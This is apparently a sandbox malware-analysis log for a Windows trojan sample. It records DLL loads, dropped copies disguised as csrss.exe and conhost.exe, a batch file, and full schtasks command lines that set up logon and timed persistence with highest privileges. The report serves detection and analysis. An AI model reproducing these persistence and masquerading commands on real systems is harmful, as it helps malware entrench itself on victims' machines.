                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: version.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: uxtheme.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: wldp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: amsi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: userenv.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: profapi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: cryptsp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: rsaenh.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: cryptbase.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: version.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: wldp.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: amsi.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: userenv.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: profapi.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: mscoree.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: version.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: uxtheme.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: wldp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: amsi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: userenv.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: profapi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: cryptsp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: rsaenh.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: cryptbase.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: version.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: amsi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: ktmw32.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: rasapi32.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: rasman.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: rtutils.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: winmm.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: winmmbase.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: mmdevapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: devobj.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: ksuser.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: avrt.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: edputil.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: dwrite.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: audioses.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: umpdc.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: msacm32.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: midimap.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Section loaded: windowscodecs.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: mscoree.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: version.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: uxtheme.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: wldp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: amsi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: userenv.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: profapi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: windows.storage.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: cryptsp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: rsaenh.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: cryptbase.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: version.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: wldp.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: amsi.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: userenv.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: profapi.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Section loaded: sspicli.dll
                    Source: KtMg6d1Ivx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: KtMg6d1Ivx.exeStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: dZtDLPHWGnqMECrRIGtvnUL.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: csrss.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: dZtDLPHWGnqMECrRIGtvnUL.exe0.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: Registry.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: conhost.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: bveMYDWO.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.KtMg6d1Ivx.exe.31534e8.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: vnUJHstD.log.39.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@48/38@0/1
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Users\user\Desktop\bveMYDWO.logJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1084:120:WilError_03
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\8b84723727d281c0c38b48504ff9e8dd56cb8ea2e6bc00074482592907dbb462
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Users\user\AppData\Local\Temp\23b8df4fb50b40e3abc14d2d8b04fea4a7f18d74Jump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oZ7RJBQMGt.bat"
                    Source: KtMg6d1Ivx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: KtMg6d1Ivx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (15 identical events)
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: KtMg6d1Ivx.exe | ReversingLabs: Detection: 75%
Source: KtMg6d1Ivx.exe | Virustotal: Detection: 72%
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File read: C:\Users\user\Desktop\KtMg6d1Ivx.exe
Source: unknown | Process created: C:\Users\user\Desktop\KtMg6d1Ivx.exe C:\Users\user\Desktop\KtMg6d1Ivx.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnUL" /sc ONLOGON /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFB8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBB09EA61AE75492FB889F62CD03E359D.TMP"
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BC.tmp" "c:\Windows\System32\CSCB818CC877B7C4E7BA59872CD9B93F1.TMP"
Source: unknown | Process created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe
Source: unknown | Process created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnUL" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oZ7RJBQMGt.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown | Process created: C:\Windows\ImmersiveControlPanel\pris\conhost.exe C:\Windows\ImmersiveControlPanel\pris\conhost.exe
Source: unknown | Process created: C:\Windows\ImmersiveControlPanel\pris\conhost.exe C:\Windows\ImmersiveControlPanel\pris\conhost.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe
Source: unknown | Process created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe
Source: unknown | Process created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"
Source: unknown | Process created: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe "C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe"
Source: unknown | Process created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"
Source: unknown | Process created: C:\Windows\ImmersiveControlPanel\pris\conhost.exe "C:\Windows\ImmersiveControlPanel\pris\conhost.exe"
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe "C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe"
Source: unknown | Process created: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe "C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe"
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdline
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFB8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBB09EA61AE75492FB889F62CD03E359D.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BC.tmp" "c:\Windows\System32\CSCB818CC877B7C4E7BA59872CD9B93F1.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\Microsoft\d28c056a32d4fc
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\WindowsPowerShell\Configuration\Schema\ee2ad38f3d4382
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Directory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\886983d96e3d3e
Source: KtMg6d1Ivx.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: KtMg6d1Ivx.exe | Static file information: File size 1342951 > 1048576
Source: KtMg6d1Ivx.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.pdb source: KtMg6d1Ivx.exe, 00000000.00000002.2040685305.0000000003804000.00000004.00000800.00020000.00000000.sdmp
